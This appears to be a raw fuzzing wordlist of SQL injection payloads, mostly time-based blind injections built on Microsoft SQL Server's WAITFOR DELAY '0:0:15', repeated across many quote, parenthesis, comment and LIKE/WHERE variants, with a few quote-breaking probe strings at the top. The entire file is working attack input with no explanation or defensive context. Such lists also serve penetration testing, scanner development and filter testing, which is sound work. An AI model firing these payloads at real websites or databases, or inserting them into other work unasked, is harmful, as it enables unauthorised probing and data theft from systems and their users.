)'."'"'))"
'sbKW<'">KcLC
) WAITFOR DELAY '0:0:15'
') WAITFOR DELAY '0:0:15'
' WAITFOR DELAY '0:0:15'
" WAITFOR DELAY '0:0:15'
) WAITFOR DELAY '0:0:15' AND (5664=5664
)) WAITFOR DELAY '0:0:15' AND ((2540=2540
))) WAITFOR DELAY '0:0:15' AND (((6880=6880
 WAITFOR DELAY '0:0:15'
') WAITFOR DELAY '0:0:15' AND ('KtDc'='KtDc
')) WAITFOR DELAY '0:0:15' AND (('STfE'='STfE
'))) WAITFOR DELAY '0:0:15' AND ((('OnDN'='OnDN
' WAITFOR DELAY '0:0:15' AND 'qoFK'='qoFK
') WAITFOR DELAY '0:0:15' AND ('aWqe' LIKE 'aWqe
')) WAITFOR DELAY '0:0:15' AND (('HrfI' LIKE 'HrfI
'))) WAITFOR DELAY '0:0:15' AND ((('FQms' LIKE 'FQms
' WAITFOR DELAY '0:0:15' AND 'iPDy' LIKE 'iPDy
") WAITFOR DELAY '0:0:15' AND ("VERz"="VERz
")) WAITFOR DELAY '0:0:15' AND (("ywMq"="ywMq
"))) WAITFOR DELAY '0:0:15' AND ((("WxRV"="WxRV
" WAITFOR DELAY '0:0:15' AND "dqVo"="dqVo
") WAITFOR DELAY '0:0:15' AND ("xBOm" LIKE "xBOm
")) WAITFOR DELAY '0:0:15' AND (("iJTY" LIKE "iJTY
"))) WAITFOR DELAY '0:0:15' AND ((("wRcU" LIKE "wRcU
" WAITFOR DELAY '0:0:15' AND "ioLp" LIKE "ioLp
%') WAITFOR DELAY '0:0:15' AND ('%'='
%')) WAITFOR DELAY '0:0:15' AND (('%'='
%'))) WAITFOR DELAY '0:0:15' AND ((('%'='
%' WAITFOR DELAY '0:0:15' AND '%'='
%") WAITFOR DELAY '0:0:15' AND ("%"="
%")) WAITFOR DELAY '0:0:15' AND (("%"="
%"))) WAITFOR DELAY '0:0:15' AND ((("%"="
%" WAITFOR DELAY '0:0:15' AND "%"="
%00') WAITFOR DELAY '0:0:15' AND ('FDni'='FDni
%00')) WAITFOR DELAY '0:0:15' AND (('dgSx'='dgSx
%00'))) WAITFOR DELAY '0:0:15' AND ((('EpHG'='EpHG
%00' WAITFOR DELAY '0:0:15' AND 'EmTQ'='EmTQ
 WAITFOR DELAY '0:0:15'-- zUdl
 WAITFOR DELAY '0:0:15'# yIDQ
') WHERE 8282=8282 WAITFOR DELAY '0:0:15'-- 
") WHERE 7219=7219 WAITFOR DELAY '0:0:15'-- 
) WHERE 1688=1688 WAITFOR DELAY '0:0:15'-- 
' WHERE 1601=1601 WAITFOR DELAY '0:0:15'-- 
" WHERE 7998=7998 WAITFOR DELAY '0:0:15'-- 
 WHERE 2716=2716 WAITFOR DELAY '0:0:15'-- 
')) AS lgQe WHERE 8820=8820 WAITFOR DELAY '0:0:15'-- 
")) AS KogE WHERE 2322=2322 WAITFOR DELAY '0:0:15'-- 
)) AS blkN WHERE 5558=5558 WAITFOR DELAY '0:0:15'-- 
') AS gwNh WHERE 9090=9090 WAITFOR DELAY '0:0:15'-- 
") AS gtlJ WHERE 9115=9115 WAITFOR DELAY '0:0:15'-- 
) AS XJeW WHERE 9086=9086 WAITFOR DELAY '0:0:15'-- 
'||(SELECT 'VoIb' FROM DUAL WHERE 1344=1344 WAITFOR DELAY '0:0:15')||'
'||(SELECT 'MrIc' WHERE 2240=2240 WAITFOR DELAY '0:0:15')||'
'+(SELECT VQiu WHERE 4699=4699 WAITFOR DELAY '0:0:15')+'
'+(SELECT 'TIcq' WHERE 8253=8253 WAITFOR DELAY '0:0:15')+'
' IN BOOLEAN MODE) WAITFOR DELAY '0:0:15'#
) WAITFOR DELAY '0:0:15'--
') WAITFOR DELAY '0:0:15'--
' WAITFOR DELAY '0:0:15'--
" WAITFOR DELAY '0:0:15'--
)) WAITFOR DELAY '0:0:15'--
))) WAITFOR DELAY '0:0:15'--
 WAITFOR DELAY '0:0:15'--
')) WAITFOR DELAY '0:0:15'--
'))) WAITFOR DELAY '0:0:15'--
") WAITFOR DELAY '0:0:15'--
")) WAITFOR DELAY '0:0:15'--
"))) WAITFOR DELAY '0:0:15'--
%') WAITFOR DELAY '0:0:15'--
%')) WAITFOR DELAY '0:0:15'--
%'))) WAITFOR DELAY '0:0:15'--
%' WAITFOR DELAY '0:0:15'--
%") WAITFOR DELAY '0:0:15'--
%")) WAITFOR DELAY '0:0:15'--
%"))) WAITFOR DELAY '0:0:15'--
%" WAITFOR DELAY '0:0:15'--
%00') WAITFOR DELAY '0:0:15'--
%00')) WAITFOR DELAY '0:0:15'--
%00'))) WAITFOR DELAY '0:0:15'--
%00' WAITFOR DELAY '0:0:15'--
') WHERE 6734=6734 WAITFOR DELAY '0:0:15'--
") WHERE 6140=6140 WAITFOR DELAY '0:0:15'--
) WHERE 2339=2339 WAITFOR DELAY '0:0:15'--
' WHERE 7215=7215 WAITFOR DELAY '0:0:15'--
" WHERE 5633=5633 WAITFOR DELAY '0:0:15'--
 WHERE 3343=3343 WAITFOR DELAY '0:0:15'--
')) AS pAQv WHERE 4712=4712 WAITFOR DELAY '0:0:15'--
")) AS pAsB WHERE 4656=4656 WAITFOR DELAY '0:0:15'--
)) AS CPIZ WHERE 4906=4906 WAITFOR DELAY '0:0:15'--
') AS aeYZ WHERE 8948=8948 WAITFOR DELAY '0:0:15'--
") AS HpdZ WHERE 6869=6869 WAITFOR DELAY '0:0:15'--
) AS ZoUr WHERE 6110=6110 WAITFOR DELAY '0:0:15'--
'||(SELECT 'GClb' FROM DUAL WHERE 6631=6631 WAITFOR DELAY '0:0:15'--
'||(SELECT 'xgNd' WHERE 6324=6324 WAITFOR DELAY '0:0:15'--
'+(SELECT YEhH WHERE 3806=3806 WAITFOR DELAY '0:0:15'--
'+(SELECT 'wmzf' WHERE 7531=7531 WAITFOR DELAY '0:0:15'--
' IN BOOLEAN MODE) WAITFOR DELAY '0:0:15'--
(SELECT (CASE WHEN (8877=8877) THEN WAITFOR DELAY '0:0:15' ELSE 8877*(SELECT 8877 FROM master..sysdatabases) END))
',(SELECT (CASE WHEN (2144=2144) THEN WAITFOR DELAY '0:0:15' ELSE 2144*(SELECT 2144 FROM master..sysdatabases) END))
,(SELECT (CASE WHEN (2144=2144) THEN WAITFOR DELAY '0:0:15' ELSE 2144*(SELECT 2144 FROM master..sysdatabases) END))
